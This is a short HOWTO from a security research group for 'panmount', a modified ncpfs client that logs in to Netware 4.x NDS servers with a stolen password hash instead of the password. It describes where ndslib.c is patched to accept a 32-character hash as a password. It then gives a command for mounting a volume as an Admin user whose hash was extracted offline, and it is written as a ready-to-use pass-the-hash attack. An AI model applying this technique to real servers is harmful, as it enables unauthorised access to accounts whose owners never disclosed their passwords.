                                  panmount HOWTO

                        (c) Nomad Mobile Research Centre
                                 www.nmrc.org


This exploit is build to make use of the ncpfs project for Linux. We used
ncpfs-2.2.0.12 available on many ftp sites, this projects implements a kind of
"Client32" for Linux, it comes with many tools and source code since it is a
GNU project.

Once the CHNAGES Applied to "ndslib.c" in the lib directory, and the project
rebuilt. You will be able to login a Netware 4.x server, with packet signature
enabled, using the hash of a user and not his password. Simply type the 
password hash as a string when asked for the password.

This works by looking at the lengh of the password submitted, if the lengh is
32 characters long, it considers you typed a hash value then converts the
hash string in hex and use this hash for authentification.

For the record, function "shuffle" in ndscrypt.c is our well known "Hash_Gen"
function. We insert in ndslib.c at line 730, where is the procedure that
authentificate to an NDS server, the instructions to check the lengh of the
password just before "shuffle" is to be called.

This exploit was made possible by the tremendous work of Volker Lendecke and
the other people who wrote ncpfs. It proves our point regarding the weakness
of NDS authentification scheme such as we described in the NCP paper.


Example :

You wish to log as user Admin.IT_dept.novell, whose hash is ae25bc4f...... and
was reveiled by running PANDORA OFFLINE against the NDS data files.

simply run : 
./panmount -S <server_name> -V <volume_name> -U CN=Admin.OU=IT_dept.O=novell <your mount point, eg /mnt/novell>
then when asked for the password type :
ae25bc4f......

This program was compiled and run on a Linux Redhat 6 box, have phun.






